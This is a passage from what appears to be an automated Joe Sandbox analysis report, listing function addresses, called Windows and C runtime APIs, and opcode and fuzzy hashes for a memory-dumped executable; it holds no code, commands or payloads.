API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9ffebd117af13c7f24dd365fd4c16704ee27521b4f886e1ce87274878123ab36
Instruction ID: 0fbd3551c7d75853495972b1d9812891e6f4b8f3f4c5bab5f8ac3fc38b8475d8
Opcode Fuzzy Hash: 9ffebd117af13c7f24dd365fd4c16704ee27521b4f886e1ce87274878123ab36
Instruction Fuzzy Hash: DAD17D70A00745AFDF29CFA8C884BEEBBB1BF59304F10452DE569A7251DB74E884CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A18F13 Relevance: 1.6, APIs: 1, Instructions: 139COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A18F18

Part of subcall function 00A1D45B: __EH_prolog.LIBCMT ref: 00A1D460
Part of subcall function 00A1D45B: _CxxThrowException.MSVCRT(?,00A58128), ref: 00A1D4AB

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$ExceptionThrow
String ID:
API String ID: 2366012087-0
Opcode ID: 122792447fd1263c2ddc40418f49fb65eaaddffe67c75455b1e71f834de28ea4
Instruction ID: dc804a8d6f151b3e691d88df9c60b49e077e1901cb33dd74f2418175ef5ba499
Opcode Fuzzy Hash: 122792447fd1263c2ddc40418f49fb65eaaddffe67c75455b1e71f834de28ea4
Instruction Fuzzy Hash: 47515174900249DFCB11CFA8C598BEEBBB4AF49304F14449DF85AD7242C7759E85DB22

Uniqueness

Uniqueness Score: -1.00%

Function 00A0E578 Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A0E57D

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: fd2b2785f5c3a1f5eb31d4c6a990fa0d9ae6a4061b085ff40419b639078e0633
Instruction ID: 657c2245be0e9f58b4a439ebcd2278151a8d629e11efc6b9a62f18f0cfd69551
Opcode Fuzzy Hash: fd2b2785f5c3a1f5eb31d4c6a990fa0d9ae6a4061b085ff40419b639078e0633
Instruction Fuzzy Hash: EE512774A0060ADFCB24CF64E4809AAFBB2FF89304B144D59E5929B790D732A915EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A16C62 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A16C67

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e2b1c6f29f9f63bd6471509c71b432bf3c4b559eb0f3734dfdce0118675752e0
Instruction ID: f90bd93431417d66ae5025ec1003f984df5e45050ddf72973fb1d3c17874ba82
Opcode Fuzzy Hash: e2b1c6f29f9f63bd6471509c71b432bf3c4b559eb0f3734dfdce0118675752e0
Instruction Fuzzy Hash: F8417C70A00A95AFDB24CF64C484BAABBB1FF44354F18866DE496CB691D770EDC4CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009E2F49 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E2F4E

Part of subcall function 009E3104: __EH_prolog.LIBCMT ref: 009E3109

Part of subcall function 009D1E55: malloc.MSVCRT ref: 009D1E68
Part of subcall function 009D1E55: _CxxThrowException.MSVCRT(?,00A50098), ref: 009D1E82

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$ExceptionThrowmalloc
String ID:
API String ID: 3744649731-0
Opcode ID: 95355b5c86a78cff84eb411570080248425b66931c684a92ac18d48229ef6632
Instruction ID: 5fe7c13e1fc8d526df345e1d19942068e4f41e2019eb68308c0e42d36b08d30a
Opcode Fuzzy Hash: 95355b5c86a78cff84eb411570080248425b66931c684a92ac18d48229ef6632
Instruction Fuzzy Hash: 355128B4445B84CFC722DF69C18868AFFF0BF68304F45886ED49A47752D7B0AA08CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009FBECE Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009FBED3

Part of subcall function 009D1E55: malloc.MSVCRT ref: 009D1E68
Part of subcall function 009D1E55: _CxxThrowException.MSVCRT(?,00A50098), ref: 009D1E82

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ExceptionH_prologThrowmalloc
String ID:
API String ID: 3978722251-0
Opcode ID: 04094662fbaadf2a4fd89066f084a504d1e1a30e11f3ea4a1fd6c2fdca8b9491
Instruction ID: e1316fae5298eb0ff6889aeff9527f7b1d18c13ca8d35ec87f537fc49c40cabe
Opcode Fuzzy Hash: 04094662fbaadf2a4fd89066f084a504d1e1a30e11f3ea4a1fd6c2fdca8b9491
Instruction Fuzzy Hash: 0241D371A042599FCB14EFA8C954BBEBBB8AF89310F24445AF545EB282CB70DD05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A09BE6 Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A09BEB

Part of subcall function 00A09B58: __EH_prolog.LIBCMT ref: 00A09B5D

Part of subcall function 00A09D5C: __EH_prolog.LIBCMT ref: 00A09D61

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 83a2fb0cb007146ed79c151051c80fcc7609e91cb7025c3bccb388a95cc75897
Instruction ID: 14fb7c0c5f3977e6c0e7e09379b9f8437b7976e344523890f45bae744303c781
Opcode Fuzzy Hash: 83a2fb0cb007146ed79c151051c80fcc7609e91cb7025c3bccb388a95cc75897
Instruction Fuzzy Hash: 2541E77248ABC4DEC322DF6891556C6FFE06F36300F98C99ED4EA43742D670A608C726

Uniqueness

Uniqueness Score: -1.00%

Function 009EF3F7 Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009EF3FC

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: bcd086754453c962ba54d0ea1dae12121d5efc391386b475f79f55fd066cca69
Instruction ID: 7fbec34dc2d82b8ae7343650591faacf94528509cc9bb6f53517afe87ba99aef
Opcode Fuzzy Hash: bcd086754453c962ba54d0ea1dae12121d5efc391386b475f79f55fd066cca69
Instruction Fuzzy Hash: 0C313E74D00249EFCB15DF9AD9959FFBBB9FF84364B20852AE41667291D7305E00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009F86C4 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009F86C9

Part of subcall function 009F8759: __EH_prolog.LIBCMT ref: 009F875E

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ac3ef18906600fc04933507179eb4125612bc5aae081845ca91658eafdfdaaca
Instruction ID: ec9e505fd796f527dc0418428156d8bc2cee86528ac4a15e0ee2d8d8fc31ebb1
Opcode Fuzzy Hash: ac3ef18906600fc04933507179eb4125612bc5aae081845ca91658eafdfdaaca
Instruction Fuzzy Hash: 62113439600209DFDB54DF69C884BABB3A9FF99310F248958FA51DB290DB31E901CB10

Uniqueness

Uniqueness Score: -1.00%

Function 009EEFE3 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009EEFE8

Part of subcall function 009E2A5F: __EH_prolog.LIBCMT ref: 009E2A64
Part of subcall function 009E2A5F: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,75C28E30), ref: 009E2A76
Part of subcall function 009E2A5F: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,75C28E30), ref: 009E2A8D
Part of subcall function 009E2A5F: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 009E2AAF
Part of subcall function 009E2A5F: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,75C28E30), ref: 009E2AC4
Part of subcall function 009E2A5F: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,75C28E30), ref: 009E2ACE

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 1532160333-0
Opcode ID: 1014ae61ebe3fdfb69f20381416af4569700efb337572aad5c32cacd351a4db2
Instruction ID: c28fc72785124d49d9ea48e581954416f4a0a73a826211c8a207c301525db2ea
Opcode Fuzzy Hash: 1014ae61ebe3fdfb69f20381416af4569700efb337572aad5c32cacd351a4db2
Instruction Fuzzy Hash: F42139B1846B90CFC321CF6B82D1686FFF0BB19600B94996ED0DA83B12C370A508CF55

Uniqueness

Uniqueness Score: -1.00%

Function 009F0A38 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009F0A3D

Part of subcall function 009D69AB: __EH_prolog.LIBCMT ref: 009D69B0

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 520dab8bdb6fce12d7a239dc2612276c163300eca1988deb8a2f723c5d6d2fba
Instruction ID: f1dabea893fcb2c31c638dfa243b02ff09a95165c001682bf2d1f353d72fdf99
Opcode Fuzzy Hash: 520dab8bdb6fce12d7a239dc2612276c163300eca1988deb8a2f723c5d6d2fba
Instruction Fuzzy Hash: F3118B719402089ACF14EBA4E8567FEBB79AFE8354F04842AE902732D7DB309D49C760

Uniqueness

Uniqueness Score: -1.00%

Function 009E5513 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E5518

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b00953dde70ca44e82d05ce3a8636c6f86bb95080aebb335659503b70991cb73
Instruction ID: 3266c04be83b6087bfb30c33e477e9473f3812f3775064b79fbabf411b22e9f0
Opcode Fuzzy Hash: b00953dde70ca44e82d05ce3a8636c6f86bb95080aebb335659503b70991cb73
Instruction Fuzzy Hash: E8118271508684EFCB05CF5AD484EA97BBAFF49304F1680E9F0199F122C675DD44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009E6BCC Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E6BD1

Part of subcall function 009D69AB: __EH_prolog.LIBCMT ref: 009D69B0

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Part of subcall function 009D729C: GetLastError.KERNEL32(009DB903), ref: 009D729C

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$ErrorLastfree
String ID:
API String ID: 683690243-0
Opcode ID: f9afffca76c7cbe5586acdc71e398d39509daef4f980947f55a0b4d4e1364120
Instruction ID: 72979e4fa247b7be3cb13b489a2771185b36231ff48e6edef17eadd026df5b77
Opcode Fuzzy Hash: f9afffca76c7cbe5586acdc71e398d39509daef4f980947f55a0b4d4e1364120
Instruction Fuzzy Hash: 0101D6766803409FC725EF75D8926DEBBB1EF99310F108A2FE9C353691CB34A909CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00A17EEC Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A17EF1

Part of subcall function 00A190C6: __EH_prolog.LIBCMT ref: 00A190CB

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$free
String ID:
API String ID: 2654054672-0
Opcode ID: 5d8d7305792f99c597dfd26a9bed56bdac78641bf47440d4a329d29475e3a5b2
Instruction ID: 3be88d83e59f737d6857af3c128233f974c495db4e89fdd11cdecfcc81d30799
Opcode Fuzzy Hash: 5d8d7305792f99c597dfd26a9bed56bdac78641bf47440d4a329d29475e3a5b2
Instruction Fuzzy Hash: 74117CB5800714DBC720EF60C906BCABBF4FF80304F10865DE4A6A3692DBB06A05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A17CDD Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A17CE2

Part of subcall function 00A17D91: __EH_prolog.LIBCMT ref: 00A17D96

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8435d71a664e56d916843aad23d107d024d4e2cd974d30caedea71d62b722a15
Instruction ID: 9c842fe0f6f5ee6239b0610d656389a279aecdd5680d82021c70f382b641081e
Opcode Fuzzy Hash: 8435d71a664e56d916843aad23d107d024d4e2cd974d30caedea71d62b722a15
Instruction Fuzzy Hash: 9B11D4B5401744CFC321DF69C18868AFBE4FB55304F50C96E90AA97712D7B0A548CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009D77D1 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNEL32(00000002,00000000,000000FF,00000000,00000000,80000000,00000000,?,009D1B1A,00000000,00000002,00000002,?,009D785D,?,00000000), ref: 009D781C

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: 168e753d3c493ba30e8b8d9b4ae6c73fa932897aa0e8444668e21e37544abcde
Instruction ID: 84e16ddddf31dc4ee0d7240e570f200d0a3465d7ff0d0e93c2407ab9896405df
Opcode Fuzzy Hash: 168e753d3c493ba30e8b8d9b4ae6c73fa932897aa0e8444668e21e37544abcde
Instruction Fuzzy Hash: D301A234144249BFDF268F94CC05BEEBFA99B45310F14C14AF8A5523E1D7719E51D760

Uniqueness

Uniqueness Score: -1.00%

Function 009F673F Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009F6744

Part of subcall function 009D1E55: malloc.MSVCRT ref: 009D1E68
Part of subcall function 009D1E55: _CxxThrowException.MSVCRT(?,00A50098), ref: 009D1E82

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ExceptionH_prologThrowmalloc
String ID:
API String ID: 3978722251-0
Opcode ID: f1fe3ba3ae9beca01193455f1066d016926e6ef2065312748092cc0942d6c8f1
Instruction ID: d766931edf918dca21906e400e86c521fe607d23afb76cdce2177072550cee90
Opcode Fuzzy Hash: f1fe3ba3ae9beca01193455f1066d016926e6ef2065312748092cc0942d6c8f1
Instruction Fuzzy Hash: 9FF0C2B6500204AFD714DF5DD481BAAF7F8EFE8314F10811EE21A93341CBB09900C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A09B27 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A0AEEC

Part of subcall function 009F5F61: __EH_prolog.LIBCMT ref: 009F5F66

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$free
String ID:
API String ID: 2654054672-0
Opcode ID: 2958551a7996b8b225f40c9a044d2e316e453198c5d1e58fab42137c287bc6fe
Instruction ID: 73b8155a117bf92142afda4cb95375cd62a0f5fa51e18d430801394d8ebb30fb
Opcode Fuzzy Hash: 2958551a7996b8b225f40c9a044d2e316e453198c5d1e58fab42137c287bc6fe
Instruction Fuzzy Hash: 06F0B4B2D007159FD7159F09E851B6AF7B8EFE4724F11412FA50257251CBB09C008751

Uniqueness

Uniqueness Score: -1.00%

Function 00A0F1B2 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A0F1B7

Part of subcall function 00A0F04C: __EH_prolog.LIBCMT ref: 00A0F051

Part of subcall function 00A0EF96: __EH_prolog.LIBCMT ref: 00A0EF9B

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Part of subcall function 00A0F22B: __EH_prolog.LIBCMT ref: 00A0F230

Part of subcall function 00A0EE3E: __EH_prolog.LIBCMT ref: 00A0EE43

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$free
String ID:
API String ID: 2654054672-0
Opcode ID: 485a414d0e0a8af9c5095a4a08bc002006f03a44449e34fb9f424dc15cc7ce71
Instruction ID: a0ab7efc43b9ebd16a5c644640b0b50da40bd3e9ac8be3092c859dba4532a66c
Opcode Fuzzy Hash: 485a414d0e0a8af9c5095a4a08bc002006f03a44449e34fb9f424dc15cc7ce71
Instruction Fuzzy Hash: 25F0F471D10754EECB29EB68E91639DBBE0AF84314F10465EE492632D2CBB81A008655

Uniqueness

Uniqueness Score: -1.00%

Function 00A07394 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A07399

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6bc3f5cdb09c5f2da8c4af7cced9315ce0b1ecf5f9b4b90f1187ef7b18fec738
Instruction ID: 9b2cbfa9b1bbecd0f0b87f8788db401f70d0bc47655b94b5206b7cf73944f3ba
Opcode Fuzzy Hash: 6bc3f5cdb09c5f2da8c4af7cced9315ce0b1ecf5f9b4b90f1187ef7b18fec738
Instruction Fuzzy Hash: 9BF04972E1011EABCB00EF98E4409AFBB75FF88780B10812AF416E72A0D7349A05DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A0B4FF Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00A0B564

Part of subcall function 00A0B618: fputs.MSVCRT ref: 00A0B681

Memory Dump Source

